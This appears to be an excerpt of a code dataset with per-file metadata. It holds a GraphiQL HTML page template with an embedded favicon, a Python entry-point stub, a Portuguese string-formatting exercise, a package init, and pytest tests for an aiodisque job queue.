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" rel="icon" type="image/x-icon" /> <style> body { margin: 0; overflow: hidden; } #graphiql { height: 100vh; } </style> <link href="//cdn.jsdelivr.net/npm/graphiql@{{graphiql_version}}/graphiql.css" rel="stylesheet" /> <script src="//cdn.jsdelivr.net/npm/promise-polyfill@8.1.3/dist/polyfill.min.js"></script> <script src="//cdn.jsdelivr.net/npm/unfetch@4.1.0/dist/unfetch.umd.js"></script> <script src="//cdn.jsdelivr.net/npm/react@16.13.1/umd/react.production.min.js"></script> <script src="//cdn.jsdelivr.net/npm/react-dom@16.13.1/umd/react-dom.production.min.js"></script> <script src="//cdn.jsdelivr.net/npm/graphiql@{{graphiql_version}}/graphiql.min.js"></script> <script src="//cdn.jsdelivr.net/npm/subscriptions-transport-ws@0.9.16/browser/client.js"></script> <script src="//cdn.jsdelivr.net/npm/graphiql-subscriptions-fetcher@0.0.2/browser/client.js"></script> </head> <body> <div id="graphiql">Loading...</div> <script> // Collect the URL parameters var parameters = {}; window.location.search.substr(1).split('&').forEach(function (entry) { var eq = entry.indexOf('='); if (eq >= 0) { parameters[decodeURIComponent(entry.slice(0, eq))] = decodeURIComponent(entry.slice(eq + 1)); } }); // Produce a Location query string from a parameter object. function locationQuery(params) { return '?' + Object.keys(params).filter(function (key) { return Boolean(params[key]); }).map(function (key) { return encodeURIComponent(key) + '=' + encodeURIComponent(params[key]); }).join('&'); } // Derive a fetch URL from the current URL, sans the GraphQL parameters. var graphqlParamNames = { query: true, variables: true, operationName: true }; var otherParams = {}; for (var k in parameters) { if (parameters.hasOwnProperty(k) && graphqlParamNames[k] !== true) { otherParams[k] = parameters[k]; } } // Configure the subscription client let subscriptionsFetcher = null; var fetchURL = locationQuery(otherParams); // Defines a GraphQL fetcher using the fetch API. function graphQLFetcher(graphQLParams, opts) { return fetch(fetchURL, { method: 'post', headers: Object.assign( { 'Accept': 'application/json', 'Content-Type': 'application/json' }, opts && opts.headers, ), body: JSON.stringify(graphQLParams), credentials: 'include', }).then(function (response) { return response.json(); }); } // When the query and variables string is edited, update the URL bar so // that it can be easily shared. function onEditQuery(newQuery) { parameters.query = newQuery; updateURL(); } function onEditVariables(newVariables) { parameters.variables = newVariables; updateURL(); } function onEditHeaders(newHeaders) { parameters.headers = newHeaders; updateURL(); } function onEditOperationName(newOperationName) { parameters.operationName = newOperationName; updateURL(); } function updateURL() { history.replaceState(null, null, locationQuery(parameters)); } // Render <GraphiQL /> into the body. ReactDOM.render( React.createElement(GraphiQL, { fetcher: subscriptionsFetcher || graphQLFetcher, onEditQuery: onEditQuery, onEditVariables: onEditVariables, onEditHeaders: onEditHeaders, onEditOperationName: onEditOperationName, query: {{ params.query|tojson }}, response: {{ result|tojson }}, variables: {{ params.variables|tojson }}, operationName: {{ params.operation_name|tojson }}, headers: {{params.headers or ''|tojson}}, headerEditorEnabled: true, shouldPersistHeaders: true, }), document.getElementById('graphiql') ); </script> </body> </html>"""
204.835821
22,834
0.909429
1,267
27,448
19.696922
0.75217
0.003526
0.004488
0.00545
0.015427
0.014385
0.013343
0.013343
0.010498
0.003767
0
0.130678
0.03676
27,448
133
22,835
206.37594
0.81323
0.000729
0
0.046512
0
0.077519
0.998942
0.884618
0
1
0
0
0
1
0
false
0
0
0
0.03876
0
0
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
0
0
0
1
1
null
1
0
0
0
0
0
0
0
0
0
0
0
0
6
cbdfcab58692651fca2db33522305c9f80c8182f
159
py
Python
bone-age/src/bsmu/bone_age/app/__main__.py
IvanKosik/vision
74603d4b727e6d993b562eb4656952e29173323e
[ "BSD-3-Clause" ]
2
2019-10-15T11:34:17.000Z
2021-02-03T10:46:07.000Z
bone-age/src/bsmu/bone_age/app/__main__.py
IvanKosik/vision
74603d4b727e6d993b562eb4656952e29173323e
[ "BSD-3-Clause" ]
null
null
null
bone-age/src/bsmu/bone_age/app/__main__.py
IvanKosik/vision
74603d4b727e6d993b562eb4656952e29173323e
[ "BSD-3-Clause" ]
null
null
null
"""Module that allows the user to run `python -m bsmu.bone_age.app`.""" from bsmu.bone_age.app.main import run_app if __name__ == '__main__': run_app()
19.875
71
0.698113
27
159
3.666667
0.666667
0.161616
0.222222
0.282828
0
0
0
0
0
0
0
0
0.163522
159
7
72
22.714286
0.744361
0.408805
0
0
0
0
0.090909
0
0
0
0
0
0
1
0
true
0
0.333333
0
0.333333
0
1
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
0
0
0
6
1dc4404a65d524a410bcf6734cda56c7cba90725
181
py
Python
CursoIntensivoPython/curso-intensivo-python-master/capitulo_02/exercicios/nomes.py
SweydAbdul/estudos-python
b052708d0566a0afb9a1c04d035467d45f820879
[ "MIT" ]
null
null
null
CursoIntensivoPython/curso-intensivo-python-master/capitulo_02/exercicios/nomes.py
SweydAbdul/estudos-python
b052708d0566a0afb9a1c04d035467d45f820879
[ "MIT" ]
null
null
null
CursoIntensivoPython/curso-intensivo-python-master/capitulo_02/exercicios/nomes.py
SweydAbdul/estudos-python
b052708d0566a0afb9a1c04d035467d45f820879
[ "MIT" ]
null
null
null
nome = 'William Rodrigues' print(f'Com letras minúsculas: {nome.lower()}') print(f'Com letras maiúsculas: {nome.upper()}') print(f'Com a primeira letra maiúscula: {nome.title()}')
30.166667
56
0.712707
26
181
4.961538
0.615385
0.139535
0.209302
0.232558
0
0
0
0
0
0
0
0
0.104972
181
5
57
36.2
0.796296
0
0
0
0
0
0.756906
0
0
0
0
0
0
1
0
false
0
0
0
0
0.75
1
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
6
1df7463d18739b01f8ae9b8506c0ca213c7c2b94
208
py
Python
torch_geometric_signed_directed/__init__.py
huangjunjie-cs/pytorch_geometric_signed_directed-1
24b121ff4325d201b30811975bcb6f104a39dc35
[ "MIT" ]
null
null
null
torch_geometric_signed_directed/__init__.py
huangjunjie-cs/pytorch_geometric_signed_directed-1
24b121ff4325d201b30811975bcb6f104a39dc35
[ "MIT" ]
null
null
null
torch_geometric_signed_directed/__init__.py
huangjunjie-cs/pytorch_geometric_signed_directed-1
24b121ff4325d201b30811975bcb6f104a39dc35
[ "MIT" ]
null
null
null
from torch_geometric_signed_directed.nn import * from torch_geometric_signed_directed.data import * from torch_geometric_signed_directed.utils import * __all__ = [ "torch_geometric", "__version__", ]
26
51
0.802885
25
208
5.96
0.44
0.375839
0.362416
0.483221
0.724832
0.510067
0
0
0
0
0
0
0.125
208
8
52
26
0.818681
0
0
0
0
0
0.124402
0
0
0
0
0
0
1
0
false
0
0.428571
0
0.428571
0
1
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
6
3804c8579b1078b89cbd844dc88b8d2aaa720cee
1,479
py
Python
tests/test_queues.py
johnnoone/aiodisque
afb6851ac907783a69b4b2e5c09456ae48a1faba
[ "MIT" ]
null
null
null
tests/test_queues.py
johnnoone/aiodisque
afb6851ac907783a69b4b2e5c09456ae48a1faba
[ "MIT" ]
null
null
null
tests/test_queues.py
johnnoone/aiodisque
afb6851ac907783a69b4b2e5c09456ae48a1faba
[ "MIT" ]
null
null
null
import pytest from aiodisque import Disque from aiodisque.queues import JobsQueue @pytest.mark.asyncio async def test_get(node, event_loop): client = Disque(node.port, loop=event_loop) queue = JobsQueue('q', client, loop=event_loop) await client.addjob('q', 'job', 5000, replicate=1, retry=0) job = await queue.get() assert hasattr(job, 'id') assert hasattr(job, 'body') assert hasattr(job, 'body') assert hasattr(job, 'queue') assert not hasattr(job, 'nacks') assert not hasattr(job, 'additional_deliveries') @pytest.mark.asyncio async def test_get_nowait(node, event_loop): client = Disque(node.port, loop=event_loop) queue = JobsQueue('q', client, loop=event_loop) with pytest.raises(NotImplementedError): queue.get_nowait() @pytest.mark.asyncio async def test_put(node, event_loop): client = Disque(node.port, loop=event_loop) queue = JobsQueue('q', client, loop=event_loop) await queue.put('job') job = await client.getjob('q') assert hasattr(job, 'id') assert hasattr(job, 'body') assert hasattr(job, 'body') assert hasattr(job, 'queue') assert not hasattr(job, 'nacks') assert not hasattr(job, 'additional_deliveries') @pytest.mark.asyncio async def test_put_nowait(node, event_loop): client = Disque(node.port, loop=event_loop) queue = JobsQueue('q', client, loop=event_loop) with pytest.raises(NotImplementedError): queue.put_nowait('job')
29.58
63
0.697769
201
1,479
5.024876
0.208955
0.106931
0.10297
0.087129
0.825743
0.825743
0.825743
0.756436
0.756436
0.756436
0
0.004914
0.174442
1,479
49
64
30.183673
0.822277
0
0
0.666667
0
0
0.065585
0.028398
0
0
0
0
0.307692
1
0
false
0
0.076923
0
0.076923
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
382e106276e9be7114e099ce4bb8c7a7c95a2b47
340
py
Python
datasets/plugins/__init__.py
talebzeghmi/datasets
db04bdcdbc7b782eae54991571181badea5e4c7a
[ "Apache-2.0" ]
null
null
null
datasets/plugins/__init__.py
talebzeghmi/datasets
db04bdcdbc7b782eae54991571181badea5e4c7a
[ "Apache-2.0" ]
null
null
null
datasets/plugins/__init__.py
talebzeghmi/datasets
db04bdcdbc7b782eae54991571181badea5e4c7a
[ "Apache-2.0" ]
null
null
null
